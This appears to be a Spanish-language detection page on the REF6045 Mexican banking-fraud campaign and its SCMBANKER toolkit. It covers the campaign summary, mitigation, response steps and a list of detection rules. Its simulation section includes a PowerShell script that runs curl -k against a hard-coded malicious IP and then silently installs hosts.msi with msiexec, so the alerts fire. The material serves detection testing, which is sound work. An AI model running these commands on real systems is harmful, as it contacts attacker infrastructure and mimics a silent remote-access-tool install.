ClickFix a Cash-Out: Desglosando un Conjunto de Herramientas de Fraude Bancario Mexicano
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
REF6045 es una campaña de fraude bancario asistida por operadores centrada en el sector financiero mexicano. Utiliza un método de entrega estilo ClickFix con páginas CAPTCHA falsas para convencer a las víctimas de ejecutar comandos maliciosos de PowerShell. Tras la infección, el kit de herramientas SCMBANKER permite a los operadores humanos observar sesiones bancarias, capturar capturas de pantalla, alterar el contenido del portapapeles y desplegar Remote Utilities RAT para un control remoto completo.
Investigación
Elastic Security Labs descubrió la amenaza tras detectar actividad bitsadmin descargando scripts de PowerShell desde un directorio abierto. La investigación expuso el conjunto completo de herramientas a través de un archivo web accesible públicamente, zkt.zip, y reveló grandes debilidades en la seguridad operacional, incluidos editores de archivos no autenticados y directorios abiertos en la infraestructura de comando y control. El análisis también mostró que el conjunto de herramientas contiene extensos artefactos generados por IA en su código.
Mitigación
Las organizaciones deben limitar el uso de PowerShell y actividad bitsadmin a usuarios aprobados y aplicar controles estrictos de ejecución. Los usuarios deben ser entrenados para identificar señuelos de ingeniería social, como mensajes CAPTCHA falsos o pantallas falsas de actualizaciones de Windows. Los equipos de seguridad también deben desplegar un fuerte monitoreo para cambios sospechosos en el registro e instalaciones no autorizadas de software de acceso remoto.
Respuesta
Si se detecta esta actividad, aísle los sistemas afectados inmediatamente para detener la comunicación de comando y control y el posible robo de datos. Realice una investigación forense para determinar el alcance de la violación y verifique la presencia de Remote Utilities o modificaciones no autorizadas del registro. Resetea las contraseñas de todas las cuentas financieras y otras cuentas sensibles accedidas desde las máquinas afectadas.
Flujo de Ataque
Detecciones
MsiExec Generado por Proceso de Shell (vía línea de comandos)
Ver
Ejecución de Attrib para Ocultar Archivos (vía línea de comandos)
Ver
Archivos Sospechosos en el Perfil Público de Usuario (vía evento de archivo)
Ver
La Posibilidad de Ejecución a Través de Líneas de Comando Ocultas de PowerShell (vía línea de comandos)
Ver
Apagado Usado Para Forzar Un Paro o Reinicio del Sistema (vía línea de comandos)
Ver
LOLBAS Bitsadmin (vía línea de comandos)
Ver
Posible Comportamiento de Ejecución Retardada (vía línea de comandos)
Ver
Posible Enumeración/Manipulación de Cuenta o Grupo (vía línea de comandos)
Ver
Microsoft Edge Generando Proceso Inusual (vía línea de comandos)
Ver
Uso Sospechoso de CURL (vía línea de comandos)
Ver
Ubicación Sospechosa de Ejecución de Ejecutable/Script vía [cmd.exe /C] (vía línea de comandos)
Ver
Detección de la instalación de SCMBANKER y Remote Utilities [Creación de Proceso de Windows]
Ver
Detección de Actividad del Kit de Herramientas SCMBANKER [Windows Powershell]
Ver
Ejecución de Simulación
Requisito Previo: La Verificación Previa de Telemetría y Línea Base debe ser exitosa.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y aspirar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa del Ataque y Comandos: El adversario intenta establecer una base en el sistema objetivo imitando el patrón de fraude bancario REF6045. Primero, intentan descargar un archivo de validación desde una dirección IP maliciosa codificada en el sistema (
68.211.161.46) usandocurlcon la bandera-k(inseguro) para omitir la validación del certificado SSL. Luego de la descarga, el adversario ejecuta una instalación silenciosa de una herramienta maliciosa de acceso remoto usandomsiexec.execon la bandera/i(install) y/quiet(silenciosa), apuntando a un archivo llamadohosts.msi. Esto les proporciona un acceso remoto persistente al mismo tiempo que minimizan la interacción con el usuario. -
Script de Prueba de Regresión:
# Script de Simulación para TTPs REF6045 # Este script imita las líneas de comando específicas definidas en la regla de detección. $WorkDir = "$env:TEMPSimulation" if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir } Set-Location $WorkDir Write-Host "[+] Paso 1: Simulando Transferencia de Herramienta de Ingreso vía curl..." -ForegroundColor Cyan # Nota: Uso de un archivo falso mediante curl para evitar tráfico malicioso real, # pero manteniendo la cadena exacta de línea de comando requerida para la detección. cmd /c curl -k https://68.211.161.46/validation.txt Write-Host "[+] Paso 2: Simulando Instalación Silenciosa de MSI..." -ForegroundColor Cyan # Crear un archivo MSI simulado para que msiexec no falle inmediatamente (aunque la regla se activa en la línea de comando) # En aras de probar PURAMENTE LA LÓGICA DE DETECCIÓN (la línea de comando), # ejecutaremos la cadena exacta de comandos. msiexec /i "hosts.msi" /quiet /norestart -
Comandos de Limpieza:
# Script de limpieza para eliminar artefactos $WorkDir = "$env:TEMPSimulation" if (Test-Path $WorkDir) { Remove-Item -Recurse -Force $WorkDir Write-Host "[+] Limpieza completa: $WorkDir eliminado." -ForegroundColor Green } else { Write-Host "[!] Limpieza omitida: Directorio no encontrado." -ForegroundColor Yellow }